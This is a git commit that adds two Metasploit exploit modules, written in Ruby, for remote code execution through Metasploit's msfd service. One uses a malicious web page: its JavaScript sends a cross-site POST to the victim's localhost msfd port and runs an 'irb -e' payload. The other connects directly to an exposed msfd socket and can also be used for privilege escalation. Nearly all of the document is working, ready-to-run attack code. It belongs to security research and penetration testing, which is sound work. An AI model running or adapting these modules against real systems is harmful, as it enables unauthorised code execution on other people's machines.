Added modules for msfd

2018-04-22 14:13:41 +02:00 · 2018-04-22 14:13:41 +02:00 · 940028f719
parent c5c02512d6
commit 940028f719
2 changed files with 140 additions and 0 deletions
--- a/modules/exploits/multi/browser/msfd_rce_browser.rb
+++ b/modules/exploits/multi/browser/msfd_rce_browser.rb
@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Metasploit msfd Remote Code Execution',
+     'Description'    => %q{
+      Metasploit's msfd-service makes it possible to get a msfconsole-like
+      interface over a TCP socket. This module connects to the msfd-socket
+      through the victim's browser.
+
+      To execute msfconsole-commands in JavaScript from a web application,
+      this module places the payload in the POST-data. These POST-requests
+      can be sent cross-domain and can therefore be sent to localhost on the
+      victim's machine. The msfconsole-command to execute code is 'rbi -e
+      "PAYLOAD"'.
+        },
+      'License'        => BSD_LICENSE,
+      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Targets'        =>
+        [
+          [ 'Automatic', {}],
+        ],
+      'Payload'        =>
+        {
+          'Space' => 8192,  # Arbitrary limit
+          'DisableNops' =>  'True',
+          'BadChars' => "\x22\x0a"
+        },
+      'DisclosureDate' => 'Apr 11 2018',
+      'DefaultTarget'  => 0))
+
+      register_options([
+        OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
+        OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
+      ])
+  end
+
+  def exploit
+    super
+  end
+
+  def on_request_uri(cli, request)
+    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
+    sc = payload.encoded
+    shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
+    var1 = rand_text_alpha(rand(6..11))
+    var2 = rand_text_alpha(rand(6..11))
+    html =  <<-EOS
+<html>
+<head></head>
+<body>
+<script>
+var #{var1} = new XMLHttpRequest();
+#{var1}.onreadystatechange = function() { if (#{var1}.readyState == 4) {console.log(#{var1}); } }
+#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
+var #{var2} = String("#{shellcode}");
+#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
+</script>
+</body>
+</html>
+EOS
+    print_status("#{msg} Sending HTML...")
+    send_response(cli, html, { 'Content-Type' => 'text/html' })
+  end
+end
--- a/modules/exploits/multi/misc/msfd_rce_remote.rb
+++ b/modules/exploits/multi/misc/msfd_rce_remote.rb
@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MSFD remote socket',
+      'Description'    => %q{
+      Metasploit's msfd-service makes it possible to get a msfconsole-like
+      interface over a TCP socket. If this socket is accessible on a remote
+      interface, an attacker can execute commands.
+
+      If msfd is running with higher privileges than the current user, this
+      module can also be used for privilege escalation. In that case, port
+      forwarding on the compromised host can be used.
+
+      Code execution is achieved with the msfconsole command: irb -e 'CODE'.
+      },
+      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
+      'License'        => BSD_LICENSE,
+      'Platform'       => "ruby",
+      'Arch'           => ARCH_RUBY,
+      'Payload'        =>
+        {
+          'Space'    => 8192,   # Arbitrary limit
+          'BadChars' => "\x27\x0a", # Quote nece
+          'DisableNops' => true
+        },
+      'Targets'  =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 11 2018',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(55554)
+      ])
+  end
+
+  def check
+    connect
+    data = sock.get
+    if data.include?("msf")
+      disconnect
+      return Exploit::CheckCode::Appears
+    end
+    disconnect
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    connect
+    data = sock.get
+    sock.put "irb -e '" + payload.encoded + "'\n"
+    disconnect
+  end
+end